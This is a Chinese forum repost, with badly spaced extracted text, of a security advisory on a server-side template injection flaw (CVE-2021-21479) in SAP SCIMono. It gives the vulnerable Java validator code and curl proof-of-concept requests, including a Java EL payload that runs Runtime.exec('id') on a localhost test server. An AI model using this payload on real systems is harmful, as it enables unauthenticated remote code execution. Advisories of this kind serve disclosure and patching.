搜索

[29090] 2021-07-27_【漏洞利用】GHSL-2020-227:服务器端模板注入导致SCIMono中未经身份验证的远程代码执行-CVE-2021

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-19
2021-07-27_【漏洞利用】GHSL-2020-227:服务器端模板注入导致SCIMono中未经身份验证的远程代码执行-CVE-2021 G H S L - 2 0 2 0 - 2 2 7   S C I M o n o     -   C V E - 2 0 2 1 O t s   2 0 2 1 - 0 7 - 2 7 O t s 2 0 2 0 - 1 1 - 1 1   S A P   2 0 2 1 - 0 9 - 0 2 0 . 0 . 1 9   2 0 2 1 - 0 9 - 0 2 S C I M o n o   J a v a   E L   ( R C E )   S C I M o n o 0 . 0 . 1 8   -   J a v a E L     J a v a     ( E L )   S C I M o n o   S e r v e r   S C I M o n o   使   J a v a   B e a n   V a l i d a t i o n   ( J S R   3 8 0 )     S c h e m a I d V a l i d a t o r .   J a v a   E L     C o n s t r a i n t V a l i d a t o r C o n t e x t . b u i l d C o n s t r a i n t V i o l a t i o n W i t h T e m p l a t e ( )   J a v a     b e a n   S c h e m a I d V a l i d a t o r V a l i d a t i o n U t i l . i n t e r p o l a t e E r r o r M e s s a g e ( ) 使 1 S C I M o n o 1 . 1 .   o r g . g l a s s f i s h . j e r s e y . e x t : j e r s e y - b e a n - v a l i d a t i o n 便   J e r s e y     B e a n   V a l i d a t i o n   1 . 2 p u b l i c   c l a s s   S c h e m a I d V a l i d a t o r   i m p l e m e n t s   C o n s t r a i n t V a l i d a t o r < V a l i d S c h e m a I d ,   S t r i n g >   {     p r i v a t e   s t a t i c   f i n a l   P a t t e r n   S C H E M A _ N A M E _ A L L O W E D _ P A T T E R N   =   P a t t e r n . c o m p i l e ( " ( ^ [ a - z A - Z ] ) ( w ) + " ) ;     @ O v e r r i d e     p u b l i c   b o o l e a n   i s V a l i d ( S t r i n g   s c h e m a I d ,   C o n s t r a i n t V a l i d a t o r C o n t e x t   c o n t e x t )   {         r e t u r n   i s V a l i d S c h e m a I d ( s c h e m a I d ,   c o n t e x t )   & &   i s V a l i d I d e n t i f i e r N a m e ( s c h e m a I d ,   c o n t e x t ) ;     }     p r i v a t e   b o o l e a n   i s V a l i d S c h e m a I d ( f i n a l   S t r i n g   s c h e m a I d ,   C o n s t r a i n t V a l i d a t o r C o n t e x t   c o n t e x t )   {         i f   ( S c h e m a s C a l l b a c k . i s C u s t o m S c h e m a ( s c h e m a I d ) )   {             r e t u r n   t r u e ;         }         V a l i d a t i o n U t i l . i n t e r p o l a t e E r r o r M e s s a g e ( c o n t e x t ,   g e n e r a t e V i o l a t i o n M e s s a g e ( s c h e m a I d ) ) ;         r e t u r n   f a l s e ;     }     . . .     p r i v a t e   S t r i n g   g e n e r a t e V i o l a t i o n M e s s a g e ( S t r i n g   a t t r i b u t e N a m e )   {         r e t u r n   S t r i n g . f o r m a t ( " T h e   a t t r i b u t e   v a l u e   " % s "   h a s   i n v a l i d   v a l u e ! " ,   a t t r i b u t e N a m e ) ;     }     . . . }   p u b l i c   s t a t i c   v o i d   i n t e r p o l a t e E r r o r M e s s a g e ( C o n s t r a i n t V a l i d a t o r C o n t e x t   c o n t e x t ,   S t r i n g   e r r o r M e s s a g e )   {         c o n t e x t . d i s a b l e D e f a u l t C o n s t r a i n t V i o l a t i o n ( ) ;         c o n t e x t . b u i l d C o n s t r a i n t V i o l a t i o n W i t h T e m p l a t e ( e r r o r M e s s a g e ) . a d d C o n s t r a i n t V i o l a t i o n ( ) ;     } i m p o r t   c o m . s a p . s c i m o n o . c a l l b a c k . s c h e m a s . S c h e m a s C a l l b a c k ; i m p o r t   c o m . s a p . s c i m o n o . e n t i t y . s c h e m a . A t t r i b u t e ;
S i m p l e S e r v e r A p p l i c a t i o n 2 . 使   I d     S c h e m a I d     $ { 1 + 1 }   E L   i d .   j a v a . l a n g . U N I X P r o c e s s C V E C V E - 2 0 2 1 - 2 1 4 7 9 i m p o r t   c o m . s a p . s c i m o n o . e n t i t y . s c h e m a . A t t r i b u t e ; i m p o r t   c o m . s a p . s c i m o n o . e n t i t y . s c h e m a . S c h e m a ; i m p o r t   j a v a x . w s . r s . W e b A p p l i c a t i o n E x c e p t i o n ; i m p o r t   j a v a x . w s . r s . c o r e . R e s p o n s e ; i m p o r t   j a v a . u t i l . L i s t ; p u b l i c   c l a s s   S c h e m a s   i m p l e m e n t s   S c h e m a s C a l l b a c k   { p u b l i c   S c h e m a s ( )   {         } p u b l i c   S c h e m a   g e t C u s t o m S c h e m a ( S t r i n g   s c h e m a I d )   { r e t u r n   n u l l ;         } p u b l i c   v o i d   c r e a t e C u s t o m S c h e m a ( S c h e m a   s c h e m a )   {         } p u b l i c   L i s t < S c h e m a >   g e t C u s t o m S c h e m a s ( )   { r e t u r n   n u l l ;         } p u b l i c   v o i d   d e l e t e C u s t o m S c h e m a ( S t r i n g   s c h e m a I d )   {         } p u b l i c   b o o l e a n   i s V a l i d S c h e m a N a m e ( S t r i n g   s c h e m a N a m e )   { r e t u r n   t r u e ;         } p u b l i c   A t t r i b u t e   g e t A t t r i b u t e ( S t r i n g   p a t h )   { r e t u r n   n u l l ;         } } @ O v e r r i d e p u b l i c   S c h e m a s C a l l b a c k   g e t S c h e m a s C a l l b a c k ( )   { r e t u r n   n e w   S c h e m a s ( ) ;         } $ >   c u r l   ' h t t p : / / l o c a l h o s t : 8 0 8 0 / s c i m / S c h e m a s / $ % 7 B 1 + 1 % 7 D ' [   { " s t a t u s "   :   " 4 0 0 " , " s c h e m a s "   :   [   " u r n : i e t f : p a r a m s : s c i m : a p i : m e s s a g e s : 2 . 0 : E r r o r "   ] , " d e t a i l "   :   " T h e   a t t r i b u t e   v a l u e   " 2 "   h a s   i n v a l i d   v a l u e ! " }   ] $ >   c u r l   " h t t p : / / l o c a l h o s t : 8 0 8 0 / s c i m / S c h e m a s / $ % 7 B ' ' . c l a s s . f o r N a m e ( ' j a v a x . s c r i p t . S c r i p t E n g i n e M a n a g e r ' ) . n e w I n s t a n c e ( ) . g e t E n g i n e B y N a m e ( ' j s ' ) . e v a l ( ' j a v a . l a n g . R u n t i m e . g e t R u n t i m e ( ) . e x e c ( " i d " ) ' ) % 7 D " [   { " s t a t u s "   :   " 4 0 0 " , " s c h e m a s "   :   [   " u r n : i e t f : p a r a m s : s c i m : a p i : m e s s a g e s : 2 . 0 : E r r o r "   ] , " d e t a i l "   :   " T h e   a t t r i b u t e   v a l u e   " j a v a . l a n g . U N I X P r o c e s s @ 3 b 1 d 4 c 1 8 "   h a s   i n v a l i d   v a l u e ! " }   ]
h t t p s : / / g i t h u b . c o m / S A P / s c i m o n o / s e c u r i t y / a d v i s o r i e s / G H S A - 2 9 q 4 - g x j q - r x 5 c
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理